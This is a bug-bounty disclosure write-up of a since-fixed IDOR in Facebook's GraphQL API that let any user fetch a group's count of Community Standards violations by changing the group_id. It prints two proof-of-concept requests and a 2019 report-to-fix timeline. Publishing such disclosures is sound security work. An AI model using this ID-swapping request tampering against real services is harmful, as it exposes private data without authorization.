[Facebook] Fetch Group Quality Insights
This would have let any Facebook user to grab "Groups Quality insight' which shows the count of violated posts made in the group when he's a non admin or a non member. Regardless of Group Privacy settings.
POC -
A GraphQL request was vulnerable to IDOR -
==============================
POST/graphqlHTTP/1.1
doc_id=2424487570966507&method=post&locale=en_US&pretty=false&format=json&purpose=fetch&variables={"params":{"path":"/groups/violations/dashboard/","params":"{\"group_id\":XXX}","nt_context":{"using_white_navbar":true,"styles_id":"12a814e188c218e88139530938077622","pixel_ratio":1},"extra_client_data":{}},"nt_context":{"using_white_navbar":true,"styles_id":"12a814e188c218e88139530938077622","pixel_ratio":1},"scale":"1"}&fb_api_req_friendly_name=NativeTemplateScreenQuery&fb_api_caller_class=graphservice&fb_api_analytics_tags=["GraphServices"]&server_timestamps=true
================================
The "group_id" could be changed here. The response will be "200 OK" and additional info which would have shown the count of "Community Standard Violations 19 violations".
The same request was on the web UI -
================================
POST/api/graphql/ HTTP/1.1
Host:www.facebook.com
av=XXX&__user=XXX&__a=1&__dyn=&__csr=&__req=4u&__be=1&__pc=PHASED:DEFAULT&dpr=1&__rev=1001409913&__s=0u2bvl:0qp5ch:o5evq3&__hsi=6757574787531864103-0&fb_dtsg=AQGd-RfxJLW3:AQGRBiPo-nvy&jazoest=22067&__spin_r=1001409913&__spin_b=trunk&__spin_t=1573370487&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GroupsQualityCSViolationsRootContainerQuery&variables={"groupID":"XXX"}&doc_id=2061462663959034
================================
Timeline -
Reported - Sunday, November 3, 2019
Triaged - Friday, November 8, 2019
Fixed - Tuesday, November 26, 2019
Rewarded - Wednesday, November 27, 2019